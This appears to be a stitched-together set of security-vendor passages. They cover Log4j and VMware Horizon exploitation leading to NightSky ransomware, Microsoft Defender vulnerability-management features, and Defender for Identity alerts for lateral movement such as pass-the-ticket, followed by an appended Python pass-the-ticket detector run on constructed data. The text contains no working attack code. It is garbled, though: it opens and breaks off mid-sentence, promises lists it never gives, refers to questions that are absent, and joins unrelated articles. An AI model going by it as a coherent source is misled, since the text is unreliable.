While services such as interact. As early as January 4, attackers started exploiting the CVE vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.
Based on our analysis, the attackers are using command-and-control (CnC) servers that spoof legitimate domains. These include service[.

Threat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment, and significantly reduces time-to-mitigate. The threat and vulnerability management capabilities within Microsoft Defender can help identify vulnerable installations.

On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities (on the device, software, and vulnerable component level) through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and supported Windows Server versions. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to a supported version. The updates include the following:
To complement this new table, the existing DeviceTvmSoftwareVulnerabilities table in advanced hunting can be used to identify vulnerabilities in installed software on devices:. These new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.
Figure 1.
Figure 2. Threat and vulnerability management dedicated CVE dashboard.
Figure 3. Threat and vulnerability management finds exposed paths.
Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk.
Note: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available. Through device discovery , unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.
Figure 5. Finding vulnerable applications and devices via software inventory.

These new capabilities provide security teams with the following. To use this feature, open the Exposed devices tab in the dedicated CVE dashboard and review the Mitigation status column.
Typically, cyberattacks are launched against any accessible entity, such as a low-privileged user, and then quickly move laterally until the attacker gains access to valuable assets. Valuable assets can be sensitive accounts, domain administrators, or highly sensitive data.
Microsoft Defender for Identity identifies these advanced threats at the source throughout the entire attack kill chain and classifies them into the following phases. To learn more about how to understand the structure and common components of all Defender for Identity security alerts, see Understanding security alerts.

The following security alerts help you identify and remediate Lateral Movement phase suspicious activities detected by Defender for Identity in your network. In this tutorial, you'll learn how to understand, classify, remediate, and prevent the following types of attacks.
Adversaries might exploit the Windows Print Spooler service to perform privileged file operations in an improper manner. An attacker who has or obtains the ability to execute code on the target, and who successfully exploits the vulnerability, could run arbitrary code with SYSTEM privileges on a target system. If run against a domain controller, the attack would allow a compromised non-administrator account to perform actions against a domain controller as SYSTEM.
This functionally allows any attacker who enters the network to instantly elevate privileges to Domain Administrator, steal all domain credentials, and distribute further malware as a Domain Admin.
In this vulnerability, servers fail to properly handle requests. An attacker who successfully exploits the vulnerability can run arbitrary code in the context of the Local System Account.
Windows servers currently configured as DNS servers are at risk from this vulnerability. In this detection, a Defender for Identity security alert is triggered when DNS queries suspected of exploiting the CVE security vulnerability are made against a domain controller in the network.
Pass-the-Hash is a lateral movement technique in which attackers steal a user's NTLM hash from one computer and use it to gain access to another computer.

Pass-the-Ticket is a lateral movement technique in which attackers steal a Kerberos ticket from one computer and use it to gain access to another computer by reusing the stolen ticket. In this detection, a Kerberos ticket is seen used on two or more different computers. Successfully resolving IPs to computers in the organization is critical to identifying pass-the-ticket attacks from one computer to another. Is the sensor not resolving one or more of the destination IP addresses? If a destination IP address is not resolved, it may indicate that the correct ports between the sensor and the devices are not open. If the answer to any of the previous questions is yes, check whether the source and destination computers are the same.
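The core of the pass-the-ticket detection above is a grouping: one ticket, presented from two or more different computers. The following is an added example, not Defender for Identity's code or schema, of that grouping over constructed sensor events, with the resolution caveat the text raises made explicit: a source IP the sensor cannot map to a computer cannot be counted as a "different computer" and is surfaced separately for triage instead of being silently dropped or silently alerted on. The event fields, the hostname table and the ticket identifiers are this example's assumptions.

```python
"""Pass-the-ticket grouping: a Kerberos ticket reused from two or more computers,
with unresolved source IPs surfaced separately. Added example; constructed data."""
from collections import defaultdict


def detect_pass_the_ticket(events, resolve):
    """events: dicts with time, user, ticket (opaque id of the ticket blob), src_ip.
    resolve: dict IP -> computer name; a missing IP means resolution failed.
    Returns (alerts, unresolved): alerts are (user, ticket, [computers in first-seen order]),
    unresolved maps each unresolvable IP to the tickets seen from it."""
    seen = defaultdict(list)
    unresolved = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        computer = resolve.get(ev["src_ip"])
        if computer is None:
            # Cannot tell whether this is a second computer or the same one (page's
            # caveat: check sensor-to-device ports, and whether src and dst are the same).
            unresolved.setdefault(ev["src_ip"], []).append(ev["ticket"])
            continue
        key = (ev["user"], ev["ticket"])
        if computer not in seen[key]:
            seen[key].append(computer)
    alerts = [(user, ticket, hosts) for (user, ticket), hosts in seen.items() if len(hosts) >= 2]
    return alerts, unresolved


RESOLVER = {"10.0.0.5": "WS-ALICE", "10.0.0.9": "WS-BOB", "10.0.0.20": "FILESRV01"}  # constructed

SAMPLE_EVENTS = [  # constructed: ticket presentations observed by a sensor on the DC
    {"time": 1, "user": "alice", "ticket": "tgt-a1f3", "src_ip": "10.0.0.5"},
    {"time": 2, "user": "alice", "ticket": "tgt-a1f3", "src_ip": "10.0.0.5"},   # same host, fine
    {"time": 3, "user": "alice", "ticket": "tgt-a1f3", "src_ip": "10.0.0.9"},   # same ticket from Bob's PC
    {"time": 4, "user": "bob", "ticket": "tgt-77c0", "src_ip": "10.0.0.9"},
    {"time": 5, "user": "bob", "ticket": "tgt-77c0", "src_ip": "10.0.0.77"},    # source does not resolve
    {"time": 6, "user": "svc-backup", "ticket": "tgt-0b0b", "src_ip": "10.0.0.20"},
]

if __name__ == "__main__":
    alerts, unresolved = detect_pass_the_ticket(SAMPLE_EVENTS, RESOLVER)
    for user, ticket, hosts in alerts:
        print(f"pass-the-ticket: {user}'s ticket {ticket} used from {', '.join(hosts)}")
    for ip, tickets in unresolved.items():
        print(f"unresolved source {ip} presented {len(tickets)} ticket(s); check sensor ports")
```

Alice's ticket is flagged because it was presented from both WS-ALICE and WS-BOB. Bob's ticket also appears from a second address, 10.0.0.77, but that address does not resolve, so the example reports it for follow-up rather than raising the alert; whether that second use is a real second computer is exactly the question the resolution check in the text is meant to answer.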